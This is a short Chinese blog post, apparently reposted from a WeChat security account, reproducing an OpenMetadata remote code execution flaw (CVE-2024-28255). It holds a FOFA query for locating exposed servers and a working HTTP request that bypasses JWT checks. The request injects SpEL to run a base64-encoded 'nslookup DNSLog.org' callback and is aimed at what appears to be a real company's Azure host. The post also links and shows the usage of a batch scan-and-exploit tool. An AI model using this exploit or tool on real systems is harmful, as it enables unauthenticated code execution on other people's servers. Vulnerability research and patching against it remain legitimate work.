OpenMetadata介绍
OpenMetadata 是一个统一的发现、可观察和治理平台,由中央元数据存储库、深入的沿袭和无缝团队协作提供支持。OpenMetadata 基于开放元数据标准和 API,支持各种数据服务的连接器,支持端到端元数据管理,让您可以自由释放数据资产的价值。
FOFA
body="openmetadata.bundle.js"
漏洞描述:
该漏洞允许攻击者通过操纵请求中的路径参数来绕过 JWT 令牌验证。这意味着攻击者可以在没有正确身份验证的情况下访问任何任意端点,包括可能导致任意 SpEL(Spring Expression Language)注入的端点。
影响版本:
OpenMetadata<1.2.4
漏洞复现:
将命令经过base64编码即可。
GET /api/v1;v1%2fusers%2flogin/events/subscriptions/validation/condition/T(java.lang.Runtime).getRuntime().exec(new%20java.lang.String(T(java.util.Base64).getDecoder().decode(%22bnNsb29rdXAgRE5TTG9nLm9yZw==%22))) HTTP/1.1
Host: openmetadata-fabercastell.eastus.cloudapp.azure.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Connection: close
DNSLog
批量扫描/利用:
工具仅用于安全测试,任何非法攻击本人概不负责.
工具仅用于安全测试,任何非法攻击本人概不负责.
https://github.com/YongYe-Security/CVE-2024-28255
存在漏洞会打印Url并保存在result.txt,也可以进行单个验证。可能存在验证不准确的情况,如:目标不出网、机器没有该命令等。
python3 CVE-2024-28255.py -f url.txt -t 5
原文始发于微信公众号(YongYe 安全实验室):CVE-2024-28255__OpenMetadata RCE复现 附批量扫描/利用
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论